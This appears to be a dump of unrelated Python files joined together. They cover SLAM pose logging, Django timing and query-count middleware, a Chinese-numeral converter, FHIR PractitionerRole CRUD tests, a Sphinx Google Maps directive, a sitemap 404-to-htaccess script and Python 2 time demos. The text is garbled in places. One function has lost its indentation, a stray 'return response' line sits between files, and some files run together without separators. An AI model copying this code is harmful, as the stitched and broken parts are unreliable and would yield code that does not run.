            filename = "pose" + self.seq_idx + "unoptimized_" + str(getUnixTime()) + ".csv"
            filename = os.path.join(self.save_dir, filename)
            np.savetxt(filename, self.pose_list, delimiter=",")
    def saveOptimizedPoseGraphResult(self, cur_node_idx, graph_optimized):
        """Dump optimized poses to CSV, then reload them as the pose list."""
        filename = "pose" + self.seq_idx + "optimized_" + str(getUnixTime()) + ".csv"
        filename = os.path.join(self.save_dir, filename)
        saveOptimizedGraphPose(cur_node_idx, graph_optimized, filename)
        # bugfix: np.savetxt writes no header row, so skiprows=1 silently
        # dropped the first optimized pose; read every row instead.
        optimized_pose_list = np.loadtxt(open(filename, "rb"), delimiter=",")
        self.pose_list = optimized_pose_list  # update with optimized pose
    def vizCurrentTrajectory(self, fig_idx):
        """Plot the accumulated x/y trajectory (KITTI camera convention)."""
        x = self.pose_list[:, 3]
        y = self.pose_list[:, 7]
        z = self.pose_list[:, 11]
        fig = plt.figure(fig_idx)
        plt.clf()
        plt.plot(-y, x, color='blue')  # kitti camera coord for clarity
        plt.axis('equal')
        plt.xlabel('x', labelpad=10)
        plt.ylabel('y', labelpad=10)
        plt.draw()
        plt.pause(0.01)  # is necessary for the plot to update for some reason
    def saveFinalPoseGraphResult(self, filename):
        """Write the 3x4 (first 12 values) part of every pose to `filename`."""
        filename = os.path.join(self.save_dir, filename)
        np.savetxt(filename, self.pose_list[:, :12])
    def saveRelativePosesResult(self, filename):
        """Write the 3x4 part of every accumulated relative pose to `filename`."""
        filename = os.path.join(self.save_dir, filename)
        np.savetxt(filename, self.rel_pose_list[:, :12])
|
#import sys
#input = sys.stdin.readline
from itertools import permutations
def main():
    """Count permutations of 0..N-1 grouped by total displacement.

    For each permutation p, the displacement is sum(|i - p[i]|); prints a
    list where index d holds the number of permutations with displacement d.
    """
    N = int(input())
    counts = [0] * (N ** 2 + 1)
    for perm in permutations(range(N)):
        displacement = sum(abs(i - v) for i, v in enumerate(perm))
        counts[displacement] += 1
    print(counts)
if __name__ == '__main__':
    main()
|
# Module metadata. ("autor" is Spanish for "author"; the name is kept as-is
# because external code may read this attribute.)
autor = "VOV"
version = "1.0.0"
|
import logging
import sys
import datetime
import uuid
from django.conf import settings
class RequestTimeLoggingMiddleware(object):
    """Middleware class logging request time to stderr.
    This class can be used to measure time of request processing
    within Django. It can be also used to log time spent in
    middleware and in view itself, by putting middleware multiple
    times in INSTALLED_MIDDLEWARE.
    Static method `log_message' may be used independently of the
    middleware itself, outside of it, and even when middleware is not
    listed in INSTALLED_MIDDLEWARE.
    """
    @staticmethod
    def log_message(request, tag, message=''):
        """Log timing message to stderr.
        Logs message about `request' with a `tag' (a string, 10
        characters or less if possible), timing info and optional
        `message'.
        Log format is "timestamp tag uuid count path +delta message"
        - timestamp is microsecond timestamp of message
        - tag is the `tag' parameter
        - uuid is the UUID identifying request
        - count is number of logged message for this request
        - path is request.path
        - delta is timedelta between first logged message
        for this request and current message
        - message is the `message' parameter.
        """
        dt = datetime.datetime.utcnow()
        # First message for this request: attach a UUID, the start time and
        # a per-request message counter.
        if not hasattr(request, '_logging_uuid'):
            request._logging_uuid = uuid.uuid1()
            request._logging_start_dt = dt
            request._logging_pass = 0
        request._logging_pass += 1
        # Python 2 print-to-stream syntax; the line is UTF-8 encoded bytes.
        print >> sys.stderr, (
            u'%s %-10s %s %2d %s +%s %s' % (
                dt.isoformat(),
                tag,
                request._logging_uuid,
                request._logging_pass,
                request.path,
                dt - request._logging_start_dt,
                message,
            )
        ).encode('utf-8')
    def process_request(self, request):
        # Entry hook: logged once per occurrence of this middleware in the stack.
        self.log_message(request, 'request ')
    def process_response(self, request, response):
        # Exit hook: log the status code plus redirect target or body size.
        s = getattr(response, 'status_code', 0)
        r = str(s)
        if s in (300, 301, 302, 307):
            r += ' => %s' % response.get('Location', '?')
        elif response.content:
            r += ' (%db)' % len(response.content)
        self.log_message(request, 'response', r)
        return response
from django.db import connection
from django.utils.log import getLogger
logger = getLogger(__name__)
class QueryCountDebugMiddleware(object):
    """
    This middleware will log the number of queries run
    and the total time taken for each request (with a
    status code of 200). It does not currently support
    multi-db setups.
    """
    def process_response(self, request, response):
        # Only instrument successful responses.
        if response.status_code == 200:
            total_time = 0
            for query in connection.queries:
                # Optional raw dump of every query, gated by settings.
                if getattr(settings, 'PRINT_QUERIES', False):
                    print query
                query_time = query.get('time')
                if query_time is None:
                    # django-debug-toolbar monkeypatches the connection
                    # cursor wrapper and adds extra information in each
                    # item in connection.queries. The query time is stored
                    # under the key "duration" rather than "time" and is
                    # in milliseconds, not seconds.
                    query_time = query.get('duration', 0) / 1000
                total_time += float(query_time)
            logger.debug('%s queries run, total %s seconds' % (len(connection.queries), total_time))
        return response
return response |
from queries import Query
class Base:
    """Shared base class for conversation states.

    Holds references to the SDK and the owning state controller, plus the
    per-state table of response phrases.
    """
    def __init__(self, state_controller):
        self.sdk = state_controller.sdk
        self.controller = state_controller
        # todo remove this var
        self.queries = Query(self.sdk)
        self.response_phrases = {}
    async def before(self, payload, data):
        """Hook invoked when the user enters this state.

        Triggered by the controller's goto() and reenter().
        :param payload:
        :param data:
        :return:
        """
        pass
    async def process(self, payload, data):
        """Hook invoked on each new user message while in this state.

        Any caller can trigger it for the current state via the
        controller's process() function.
        :param payload:
        :param data:
        :return:
        """
        pass
    # todo add a function to parse user's response (choose right in self.response_phrases)
    # todo add regex support
|
# @Time : 2018/4/3 9:57
# @Author : Jing Xu
import sys,re,types
class NotIntegerError(Exception):
    """Raised by to_chinese() when the argument is not an integer."""
    pass
class OutOfRangeError(Exception):
    """Raised by to_chinese() when the argument is outside [_MIN, _MAX]."""
    pass
_MAPPING = (u'零', u'一', u'二', u'三', u'四', u'五', u'六', u'七', u'八', u'九',)
_P0 = (u'', u'十', u'百', u'千',)
_S4, _S8, _S16 = 10 ** 4, 10 ** 8, 10 ** 16
_MIN, _MAX = 0, 9999999999999999
def _to_chinese4(num):
'''转换[0, 10000)之间的阿拉伯数字
'''
assert (0 <= num and num < _S4)
if num < 10:
return _MAPPING[num]
else:
lst = []
while num >= 10:
lst.append(num % 10)
num = num / 10
lst.append(num)
c = len(lst) # 位数
result = u''
for idx, val in enumerate(lst):
if val != 0:
result += _P0[idx] + _MAPPING[val]
if idx < c - 1 and lst[idx + 1] == 0:
result += u'零'
return result[::-1].replace(u'一十', u'十')
def _to_chinese8(num):
    """Convert an integer in [0, 10**8) to Chinese numerals (adds 万)."""
    assert (num < _S8)
    to4 = _to_chinese4
    if num < _S4:
        return to4(num)
    else:
        mod = _S4
        # bugfix: '/' produced floats on Python 3; floor division keeps ints.
        high, low = num // mod, num % mod
        if low == 0:
            return to4(high) + u'万'
        else:
            # a leading zero in the low group needs an explicit 零
            if low < _S4 // 10:
                return to4(high) + u'万零' + to4(low)
            else:
                return to4(high) + u'万' + to4(low)
def _to_chinese16(num):
    """Convert an integer in [0, 10**16) to Chinese numerals (adds 亿)."""
    assert (num < _S16)
    to8 = _to_chinese8
    mod = _S8
    # bugfix: '/' produced floats on Python 3; floor division keeps ints.
    high, low = num // mod, num % mod
    if low == 0:
        return to8(high) + u'亿'
    else:
        # a leading zero in the low group needs an explicit 零
        if low < _S8 // 10:
            return to8(high) + u'亿零' + to8(low)
        else:
            return to8(high) + u'亿' + to8(low)
def to_chinese(num):
    """Convert a non-negative integer below 10**16 to Chinese numerals.

    Raises:
        NotIntegerError: if num is not exactly an int (bool is rejected too,
            matching the original exact-type check).
        OutOfRangeError: if num is outside [_MIN, _MAX].
    """
    # Exact type check kept on purpose (isinstance would accept bool).
    if type(num) != int:
        # bugfix: error message grammar ("a integer" -> "an integer").
        raise NotIntegerError(u'%s is not an integer.' % num)
    if num < _MIN or num > _MAX:
        raise OutOfRangeError(u'%d out of range[%d, %d)' % (num, _MIN, _MAX))
    # Dispatch on magnitude to the matching converter.
    if num < _S4:
        return _to_chinese4(num)
    elif num < _S8:
        return _to_chinese8(num)
    else:
        return _to_chinese16(num)
def start_window():
    '''
    Start screen: prompt for the number to convert.

    Keeps asking until a non-empty value is entered; 'q'/'Q' exits the
    program.

    :return: the raw, stripped, non-empty input string
    '''
    start_info = "数字转换"
    print( start_info.center( 50, "*" ), "\n" )
    while True:
        # bugfix: a debug leftover hard-coded number = "123456.78", making
        # the prompt dead code and ignoring all user input; restore the prompt.
        number = input( "请输入你要转换的数字[q:退出]:\n" ).strip()
        if number == "q" or number == "Q":
            sys.exit("关闭程序")
        elif len(number) == 0:
            continue
        else:
            return number
def format_string(string):
    '''
    Normalize an expression string: collapse doubled sign characters into a
    single sign and remove spaces.

    :param string: expression to clean up
    :return: the expression with redundant +/- pairs collapsed and spaces gone
    '''
    # Order matters and mirrors the original pass: sign pairs first, then
    # space removal (a single left-to-right pass, not a fixpoint).
    replacements = (
        ('--', '+'),
        ('-+', '-'),
        ('+-', '-'),
        ('++', '+'),
        (' ', ''),
    )
    for old, new in replacements:
        string = string.replace(old, new)
    return string
def trans(number):
    '''
    Split a numeric string at the decimal point and spell out the decimals.

    :param number: numeric string such as "123.45"
    :return: (integer_part_string, decimal_part_in_chinese); the decimal part
        is "" when the input has no decimal point
    '''
    point = "."
    num = ['零', '一', '二', '三', '四', '五', '六', '七', '八', '九']
    trans_decimal = ""
    # bugfix: the original used re.findall(point, number), and "." as a regex
    # matches ANY character -- so integer input like "123" crashed on the
    # 2-value unpack below. A plain substring test is what was intended.
    if point in number:
        number, decimal = number.split(point)
        trans_decimal = "".join(num[int(digit)] for digit in decimal)
    return number, trans_decimal
if __name__ == "__main__":
    # Pipeline: read input, normalize signs/spaces, split off any decimals,
    # convert the integer part, then append the spelled-out decimal digits.
    number = start_window()
    number = format_string(number)
    number, trans_decimal = trans(number)
    number = to_chinese(int(number))
    if trans_decimal:
        # "点" is the spoken decimal point
        number = "".join([number, "点", trans_decimal])
    print(number)
|
# TODO:
# 1. why do we need to compile the example in order to build the library in lib?
# 2. related: compiling with too many processors causes some example executable to try to load the gmedia library even when it's not build. How to prevent that?
# 3. finish the export=env for various libraries
from init_env import init_environment
# each library has also an SConstruct to build the example
env = init_environment("mlibrary qt5 clhep geant4")
# Sub-libraries, each built by its own SConscript; only the ones that need
# the shared construction environment export it explicitly.
options = SConscript('options/SConscript')
textProgressBar = SConscript('textProgressBar/SConscript')
translationTable = SConscript('translationTable/SConscript')
splash = SConscript('splash/SConscript')
gruns = SConscript('gruns/SConscript')
frequencySyncSignal = SConscript('frequencySyncSignal/SConscript')
gstring = SConscript('gstring/SConscript')
qtButtonsWidget = SConscript('qtButtonsWidget/SConscript')
gvolume = SConscript('gvolume/SConscript')
g4display = SConscript('g4display/SConscript', exports='env')
g4volume = SConscript('g4volume/SConscript')
gtouchable = SConscript('gtouchable/SConscript')
ghit = SConscript('ghit/SConscript', exports='env')
gdynamic = SConscript('gdynamic/SConscript', exports='env')
gdata = SConscript('gdata/SConscript', exports='env')
gmedia = SConscript('gmedia/SConscript', exports='env')
# gmedia consumes gdata targets, so force the build order.
Depends(gmedia, gdata)
# output plugins
gmediaDLLS = SConscript('gmedia/SConscriptDLL')
# plugins link against the gmedia library, so gmedia must be built first
Depends(gmediaDLLS, gmedia)
|
import pytest
import pdb
#from fhir_walk.model.organization import organization
from fhir_walk.model import unwrap_bundle
from fhireval.test_suite.crud import prep_server
# Display name and scoring weight consumed by the evaluation harness.
test_id = f"{'2.2.10':<10} - CRUD PractionerRole"
test_weight = 2
# Cache the server-assigned ids created in the CREATE test so the
# READ/UPDATE/PATCH/DELETE tests below can reference them.
example_practitioner_id = None
example_practitioner_role_id = None
example_organization_id = None
def test_create_research_practitioner_role(host, prep_server):
    """CREATE: post a Practitioner and an Organization, then a
    PractitionerRole referencing both; cache the server-assigned ids for the
    later CRUD tests."""
    global example_practitioner_id, example_practitioner_role_id, example_organization_id
    example_organization = prep_server['Common-Examples']['Organization'][0]
    example_practitioner = prep_server['Common-Examples']['Practitioner'][0]
    example_practitioner_role = prep_server['Common-Examples'][
        'PractitionerRole'][0]
    response = host.post('Practitioner',
                         example_practitioner,
                         validate_only=False)
    assert response['status_code'] == 201, 'CREATE success'
    example_practitioner_id = response['response']['id']
    response = host.post('Organization',
                         example_organization,
                         validate_only=False)
    assert response['status_code'] == 201, 'CREATE success'
    example_organization_id = response['response']['id']
    # We have to do some tweaking to the references used by Practitioner_role
    example_practitioner_role['practitioner'][
        'reference'] = f"Practitioner/{example_practitioner_id}"
    example_practitioner_role['organization'][
        'reference'] = f"Organization/{example_organization_id}"
    response = host.post('PractitionerRole',
                         example_practitioner_role,
                         validate_only=False)
    assert response['status_code'] == 201, 'PractitionerRole CREATE success'
    example_practitioner_role_id = response['response']['id']
def test_read_research_practitioner_role(host, prep_server):
    """READ: fetch the created PractitionerRole and spot-check its contents."""
    global example_practitioner_id, example_practitioner_role_id, example_organization_id
    example_practitioner_role = prep_server['Common-Examples'][
        'PractitionerRole'][0]
    practitioner_query = host.get(
        f"PractitionerRole/{example_practitioner_role_id}").entries
    assert len(practitioner_query) == 1, "READ Success and only one was found"
    # Just make sure we got what we expected
    assert example_practitioner_role['code'][0]['coding'][0][
        'display'] == practitioner_query[0]['code'][0]['coding'][0][
        'display'], 'Verify Code matches'
    assert example_practitioner_role[
        'active'], "Make sure that active is true so we can patch-change it"
def test_update_research_practitioner_role(host, prep_server):
    """UPDATE: change the role's coding display and verify it round-trips."""
    global example_practitioner_id, example_practitioner_role_id, example_organization_id
    import copy  # local import: the module header does not import copy
    example_practitioner_role = prep_server['Common-Examples'][
        'PractitionerRole'][0]
    # bugfix: dict.copy() is shallow, so editing the nested coding display
    # below also mutated the shared prep_server fixture data; deep-copy keeps
    # the fixture pristine for any test that runs afterwards.
    altered_practitioner_role = copy.deepcopy(example_practitioner_role)
    altered_practitioner_role['code'][0]['coding'][0][
        'display'] = 'Research Investigator Person'
    altered_practitioner_role['id'] = example_practitioner_role_id
    result = host.update('PractitionerRole', example_practitioner_role_id,
                         altered_practitioner_role)
    assert result['status_code'] == 200
    practitioner_qry = host.get(
        f"PractitionerRole/{example_practitioner_role_id}").entries
    assert len(practitioner_qry) == 1, "READ success and only one was found"
    assert practitioner_qry[0]['code'][0]['coding'][0][
        'display'] == 'Research Investigator Person'
def test_patch_research_practitioner_role(host, prep_server):
    """PATCH: flip `active` to False via a JSON-Patch replace operation."""
    global example_practitioner_id, example_practitioner_role_id, example_organization_id
    patch_ops = [{"op": "replace", "path": "/active", "value": False}]
    result = host.patch('PractitionerRole', example_practitioner_role_id,
                        patch_ops)
    assert result['status_code'] == 200
    practitioner_qry = result['response']
    assert not practitioner_qry['active']
def test_delete_research_practitioner_role(host, prep_server):
    """DELETE: remove the role first (it references the other two resources),
    then the practitioner and the organization."""
    global example_practitioner_id, example_practitioner_role_id, example_organization_id
    delete_result = host.delete_by_record_id('PractitionerRole',
                                             example_practitioner_role_id)
    assert delete_result['status_code'] == 200
    delete_result = host.delete_by_record_id('Practitioner',
                                             example_practitioner_id)
    assert delete_result['status_code'] == 200
    delete_result = host.delete_by_record_id('Organization',
                                             example_organization_id)
    assert delete_result['status_code'] == 200
|
# -*- coding: utf-8 -*-
import urllib
from docutils import nodes
from docutils.parsers.rst import directives
from sphinx.util.compat import Directive
class googlemaps_legacy(nodes.General, nodes.Element):
    """Docutils node carrying the options of a google-maps-legacy directive."""
    pass
class GoogleMapsDirective(Directive):
    """Directive for embedding google-maps (legacy embed URL)."""
    has_content = False
    required_arguments = 0
    optional_arguments = 1
    final_argument_whitespace = True
    # Conversion functions docutils applies when parsing each option value.
    option_spec = {
        "lang": unicode,
        "saddr": unicode,
        "daddr": unicode,
        "dirflg": directives.single_char_or_unicode,
        "latitude": float,
        "longtitude": float,
        "zoom": directives.nonnegative_int,
    }
    def run(self):
        """Build a googlemaps_legacy node from the directive's argument/options."""
        node = googlemaps_legacy()
        if self.arguments:
            node["query"] = " ".join(self.arguments)
        for key in self.option_spec.keys():
            # bugfix/idiom: dict.has_key() has been deprecated since
            # Python 2.2 and was removed in Python 3; the `in` operator
            # behaves identically on both.
            if key in self.options:
                node[key] = self.options[key]
        return [node]
def visit_googlemaps_node(self, node):
    """HTML visitor: render the node as a Google Maps <iframe> embed."""
    # Base query parameters of the legacy maps embed API.
    params = dict(f="q",
                  t="m",
                  om=0,
                  ie="UTF8",
                  oe="UTF8",
                  output="embed")
    # Copy only the options that were set on the directive, UTF-8 encoded
    # for urllib.urlencode (Python 2 bytes requirement).
    if "lang" in node:
        params["hl"] = node["lang"].encode("utf-8")
    if "query" in node:
        params["q"] = node["query"].encode("utf-8")
    if "saddr" in node:
        params["saddr"] = node["saddr"].encode("utf-8")
    if "daddr" in node:
        params["daddr"] = node["daddr"].encode("utf-8")
    if "dirflg" in node:
        params["dirflg"] = node["dirflg"].encode("utf-8")
    # Latitude/longitude become a single "ll" pair; both must be present.
    if "latitude" in node and "longtitude" in node:
        params["ll"] = "%f,%f" % (node["latitude"], node["longtitude"])
    if "zoom" in node:
        params["z"] = str(node["zoom"])
    baseurl = "http://maps.google.com/maps?"
    iframe = """<iframe width="600" height="350" frameborder="0"
                scrolling="no" marginheight="0"
                marginwidth="0" src="%s">
        </iframe>"""
    url = baseurl + urllib.urlencode(params)
    self.body.append(iframe % url)
def depart_googlemaps_node(self, node):
    # Nothing to close: the visitor emits the complete iframe markup.
    pass
def setup(app):
    """Sphinx extension entry point: register the node and the directive."""
    app.add_node(googlemaps_legacy,
                 html=(visit_googlemaps_node, depart_googlemaps_node))
    app.add_directive("google-maps-legacy", GoogleMapsDirective)
|
from mongodb import MongoTable
from migrate_data import migrate_data
import yaml
import os
class Args():
    """Hard-coded stand-in for command-line arguments.

    All paths are machine-specific; adjust before running elsewhere.
    """
    def __init__(self):
        self.dir = "/home/pybeef/workspace/data"            # dump directory scanned for tables
        self.config = "/home/pybeef/workspace/leancloud-backup/gen_schema_config.yml"  # YAML config path
        self.table = "Cow"                                  # single table to migrate; None = all
        self.data_dir = "/home/pybeef/workspace/dump_data/"
        self.error_dir = "/home/pybeef/err_table/"
        self.test = True
# Module-level singleton used by main() below.
args = Args()
def main():
    """Migrate MongoDB dump tables according to the YAML config.

    When args.table is None, every table found in args.dir is migrated
    (minus the configured ignore list); otherwise only the named table.
    """
    with open(args.config) as f:
        # safe_load: the config is plain data, and yaml.load() without an
        # explicit Loader is unsafe and rejected by modern PyYAML.
        config = yaml.safe_load(f.read())
    ignore_tables = config.get("ignore_tables", [])
    if args.table is None:
        for t in MongoTable.iter_tables(args.dir):
            if t.name in ignore_tables:
                continue
            # NOTE(review): called as migrate_data(t, config) here but as
            # migrate_data(args, t, config) in the else branch below -- one
            # of the two argument lists is almost certainly wrong; confirm
            # against migrate_data's signature.
            migrate_data(t, config)
    elif args.table in ignore_tables:
        print("%s is an ignored table" % args.table)
    else:
        p = os.path.join(args.dir, "%s_all.json" % args.table)
        t = MongoTable.get_table(p)
        migrate_data(args, t, config)
if __name__ == "__main__":
    main()
|
from rest_framework import serializers
from .models import Delivery, Parcel
class ParcelSerializer(serializers.ModelSerializer):
    """Write serializer exposing every Parcel field (used for nested create)."""
    class Meta:
        model = Parcel
        fields = '__all__'
class ParcelSerializerRead(serializers.ModelSerializer):
    """Read-only view of a Parcel: declared and measured dimensions/weights."""
    class Meta:
        model = Parcel
        fields = (
            "length",
            "width",
            "height",
            "weight",
            "real_length",
            "real_width",
            "real_height",
            "real_weight",
            "total_weight",
            "over_weight",
        )
class DeliverySerializer(serializers.ModelSerializer):
    """Write serializer for Delivery with a nested Parcel payload."""
    parcel = ParcelSerializer()
    def create(self, validated_data):
        """Create the Delivery first, then its nested Parcel pointing back at it."""
        # bugfix: the nested 'parcel' data arrives inside validated_data and
        # must be removed before Delivery.objects.create(**validated_data) --
        # Delivery has no 'parcel' column, so passing it through raised a
        # TypeError on create.
        parcel = validated_data.pop('parcel')
        instance = Delivery.objects.create(**validated_data)
        parcel['delivery'] = instance.id
        parcel_created = ParcelSerializer(data=parcel)
        parcel_created.is_valid(raise_exception=True)
        parcel_created = parcel_created.save()
        return instance
    class Meta:
        model = Delivery
        fields = (
            "id",
            "tracking_number",
            "carrier",
            "parcel",
        )
class DeliveryReadSerializer(serializers.ModelSerializer):
    """Read serializer that inlines the first Parcel attached to the Delivery."""
    parcel = serializers.SerializerMethodField()
    def get_parcel(self, obj):
        # A delivery may have several parcels; only the first one is
        # serialized here.
        parcel_obj = Parcel.objects.filter(delivery_id=obj.id).first()
        parcel = ParcelSerializerRead(parcel_obj).data
        return parcel
    class Meta:
        model = Delivery
        fields = (
            "id",
            "tracking_number",
            "carrier",
            "parcel",
        )
|
from django.db import models
from django.contrib.auth.models import User
# Create your models here.
class Message(models.Model):
    """Private message sent from one user to another."""
    # on_delete is mandatory from Django 2.0 on; CASCADE reproduces the
    # implicit default of Django < 2.0, so behavior is unchanged.
    sender = models.ForeignKey(User, related_name='message_user',
                               on_delete=models.CASCADE)
    recipient = models.ForeignKey(User, related_name='message_target',
                                  on_delete=models.CASCADE)
    subject = models.CharField(max_length=100)
    body = models.TextField()
    # Whether the body is stored encrypted; no default, so forms must supply it.
    encrypted = models.BooleanField()
import sys
import textwrap
import traceback
import urllib
import xbmc
import datetime
import time
import _strptime
import config
DATE_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
def log(s):
    # Emit an add-on-tagged message to the Kodi log at NOTICE level.
    xbmc.log("[%s v%s] %s" % (config.NAME, config.VERSION, s), level=xbmc.LOGNOTICE)
def log_error(message=None):
    """Log the current exception (function name + line number) to the Kodi log.

    If `message` is given it replaces the exception value in the log line.
    """
    exc_type, exc_value, exc_traceback = sys.exc_info()
    if message:
        exc_value = message
    xbmc.log("[%s v%s] ERROR: %s (%d) - %s" % (
        config.NAME, config.VERSION, exc_traceback.tb_frame.f_code.co_name, exc_traceback.tb_lineno, exc_value),
        level=xbmc.LOGNOTICE)
    traceback.print_exc()
def dialog_error(msg):
    """Build a list of lines describing the current exception for a Kodi dialog."""
    # Generate a list of lines for use in XBMC dialog
    content = []
    exc_type, exc_value, exc_traceback = sys.exc_info()
    content.append("%s v%s Error" % (config.NAME, config.VERSION))
    content.append("%s (%d) - %s" % (exc_traceback.tb_frame.f_code.co_name, exc_traceback.tb_lineno, msg))
    content.append(str(exc_value))
    return content
def dialog_message(msg, title=None):
    """Wrap `msg` to 60 columns and prepend a title line.

    Falls back to "<NAME> v<VERSION>" from config when no title is given.
    Returns the list of lines ready for a Kodi dialog.
    """
    header = title if title else "%s v%s" % (config.NAME, config.VERSION)
    lines = textwrap.wrap(msg, 60)
    lines.insert(0, header)
    return lines
def get_url(s):
    """Parse a plugin query string such as "?a=1&b=2" into a dict.

    Pairs shorter than 3 characters are skipped; values are
    percent/plus-decoded (Python 2 urllib API).
    """
    params = {}  # renamed: the original shadowed the builtin `dict`
    pairs = s.lstrip("?").split("&")
    for pair in pairs:
        if len(pair) < 3:
            continue
        kv = pair.split("=", 1)
        params[kv[0]] = urllib.unquote_plus(kv[1])
    return params
def isEmpty(param):
    """Return True when `param` is None or the empty string, else False.

    Bugfix: the original fell off the end and returned None (falsy) for
    non-empty values; an explicit boolean keeps truthiness-compatible
    behavior while giving a consistent return type.
    """
    return param is None or param == ""
def dateFromString(string, fmt=DATE_FORMAT):
    """Parse `string` with `fmt` into a datetime.

    Workaround from https://forum.kodi.tv/showthread.php?tid=112916 --
    under Kodi, datetime.strptime can raise TypeError after reimport, so
    fall back to time.strptime and rebuild the datetime from its fields.
    """
    try:
        return datetime.datetime.strptime(string, fmt)
    except TypeError:
        return datetime.datetime(*(time.strptime(string, fmt)[0:6]))
def dateFromUnix(string):
    """Convert a Unix timestamp to a naive UTC datetime."""
    timestamp = string
    return datetime.datetime.utcfromtimestamp(timestamp)
def unixTSFromDateString(string):
    """Convert a 'YYYY-MM-DD' string to a Unix timestamp (seconds, UTC midnight)."""
    parsed = datetime.datetime(*(time.strptime(string, "%Y-%m-%d")[:6]))
    epoch = datetime.datetime(1970, 1, 1)
    return int((parsed - epoch).total_seconds())
def stringFromDateNow():
    """Return the current local time formatted with the module-wide DATE_FORMAT."""
    now = datetime.datetime.now()
    return now.strftime(DATE_FORMAT)
|
# flake8: noqa: F401
from .monero_transaction import MoneroTransaction
|
import requests
from time import sleep
# Scan sitemap.xml for <loc> URLs; every URL that returns HTTP 404 gets a
# "Redirect 301" stub appended to htaccess.txt.
# (removed: an unused `array = []` left over from development)
count = 0
print("Working...\n")
# with-blocks guarantee both files are closed (the original leaked both
# handles), and the builtin name `file` is no longer shadowed.
with open("sitemap.xml", "r") as sitemap, open("htaccess.txt", "w+") as out:
    for line in sitemap:
        if("<loc>" in line):
            line = line.strip()
            line = line[5:-6]  # drop the surrounding <loc>...</loc> tags
            print("Checking URL " + line)
            if(requests.get(line).status_code == 404):
                print("404 Error found at URL " + line)
                print("Adding to file...")
                line = line.replace("https://", "")
                line = line.replace("http://", "")
                start = line.find('/')
                url = line[start:]  # keep only the path component
                out.write("Redirect 301 " + url + " [NEW_URL_HERE]\n")
                print("URL added.\n")
                count += 1
            else:
                print("Above URL has been verified and does not return a 404 error.\n")
print(str(count) + " URLs added to htaccess.txt file.")
print("Email me at bradan@conceptmarketing.com.au if you encounter any issues.")
# Ten-second visible countdown before the console window closes.
for i in range(10):
    k = 10-i
    print("Closing program in " + str(k) + " seconds")
    sleep(1)
# Generated by Django 2.0.2 on 2018-05-30 05:43
from django.db import migrations
class Migration(migrations.Migration):
    """Rename 'c_time' to 'createtime' on the article and bannerinfo models."""
    dependencies = [
        ('login', '0003_auto_20180530_0540'),
    ]
    operations = [
        migrations.RenameField(
            model_name='article',
            old_name='c_time',
            new_name='createtime',
        ),
        migrations.RenameField(
            model_name='bannerinfo',
            old_name='c_time',
            new_name='createtime',
        ),
    ]
|
# 使用函数来实现多多任务的封装
import threading
import time
def sing():
    """Print the running thread's name with a '---sing---' tag, once a second, five times."""
    for _ in range(5):
        name = threading.current_thread().name
        print("{}---sing---".format(name))
        time.sleep(1)
def dance():
    """Print the running thread's name with a '---dance---' tag, once a second, ten times."""
    for _ in range(10):
        name = threading.current_thread().name
        print("{}---dance---".format(name))
        time.sleep(1)
def main():
    """Spawn the sing/dance threads and wait until only the main thread is left."""
    print("start:", end="")
    print(threading.enumerate())
    t1 = threading.Thread(target=sing,name="sing")
    t2 = threading.Thread(target=dance,name="dance")
    # If run() were called instead of start(), everything would execute on
    # the main thread and threading.current_thread().name would always be
    # MainThread.
    # t1.run()
    # t2.run()
    print("second:", end="")
    print(threading.enumerate())
    t1.start()
    t2.start()
    print("third:", end="")
    print(threading.enumerate())
    # Poll the number of live threads in the current process until only the
    # main thread remains.
    while True:
        print(threading.enumerate())
        #print("当前线程数量为:%d" % (len(threading.enumerate())))
        if len(threading.enumerate()) <= 1:
            break
        time.sleep(1)
# Run the demo only when executed directly (not when imported).
if __name__ == "__main__":
    main()
__author__ = 'Leonel Gonzalez'
from esfera import *
from DecimalBinario import *
from memoria_estatica import *
# Demo driver exercising the Esfera class (most calls are parked inside the
# big string literal below, which is Python 2 code kept for reference).
Esferita = Esfera(56)
"""
print "El radio es:" , Esferita.getRadio()
print "El diametro es:" , Esferita.getDiametro()
print "La circunferencia es: ", Esferita.getCircunferencia()
print "El area es: ", Esferita.getArea()
print "El volumen es: ", Esferita.getVolumen()
arreglo = memoria_estatica()
arreglo.recorrerArreglo()
print 'Agregar elemento'
elemento = raw_input()
arreglo.agregarelementoarray(elemento)
arreglo.recorrerArreglo()
promedio = 9.67
otralista = []
supermercado = ['fruta','agua', 'refresco', 'pan', 'pastel']
estructuradedatos = ['agustin pimentel', 'francisco pineda', 'enrique bello']
precios = [12, 34, 45, 47]
porcentajes = [.34, .56, .12, 1.2]
listas = memDinamica(supermercado)
listas.imprimirLista()
listas.ordenarLista()
listas.imprimirLista()
listas.agregarelementoarray('cerveza')
listas.imprimirLista()
lista2 = memDinamica(precios)
lista2.imprimirLista()
lista2.agregarelementoarray(89)
lista2.imprimirLista()
"""
# Decimal-to-binary / decimal-to-octal conversion demo.
numero = convertidor()
print (numero.decimalABinario(10))
print (numero.decimalAOctal(8))
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @author: Xiangwan
import time
t = time.time()
print '当前时间戳为: ', t
localtime = time.localtime(time.time())  # time tuple for local time (author's note: tm_isdst=0 because of daylight saving time, otherwise 1)
print '本地时间为: ', localtime  # the name `localtime` is arbitrary and can be changed
localtime2 = time.asctime(time.localtime(time.time()))  # formatted time string built from a time tuple
print '本地时间为: ', localtime2
print time.strftime('%Y-%m-%d %H:%M:%S', time.localtime())  # format the date
print time.strftime('%a %b %d %H:%M:%S %Y', time.localtime())  # same as above: takes a time tuple and returns local time as a readable string, format decided by fmt
a = 'Tue Jul 25 16:27:24 2017'
print time.mktime(time.strptime(a,'%a %b %d %H:%M:%S %Y'))  # time.strptime(str, fmt='%a %b %d %H:%M:%S %Y') parses a time string back into a time tuple according to fmt
# time.mktime() accepts a time tuple and returns a timestamp, so passing time.localtime(time.time()) would also work here
print 'time altzone %d ' % time.altzone  # offset in seconds of DST zones west of Greenwich; China is east of Greenwich, so it is negative (same for the UK and Western Europe)
localtime3 = time.gmtime(time.time())  # tm_isdst is always 0 for GMT
print '格林威治时间为:', localtime3
t0 = time.clock()  # measures the process's real running time, quite precise (author's note: "my computer is so slow!")
print time.clock()
def procedure():
    time.sleep(5)  # suspend execution -- 5 seconds here
t1 = time.time()
procedure()
print time.time() - t1
import calendar  # get the calendar of a given month
cal = calendar.month(2017,7)
print '以下输出2017年7月份的日历:'
print cal
print calendar.isleap(2017)  # check whether the year is a leap year
print calendar.leapdays(1991,2017)  # count the leap years between 1991 and 2017
|
from django.db import models
from cloudinary.models import CloudinaryField
from django.contrib.auth.models import User
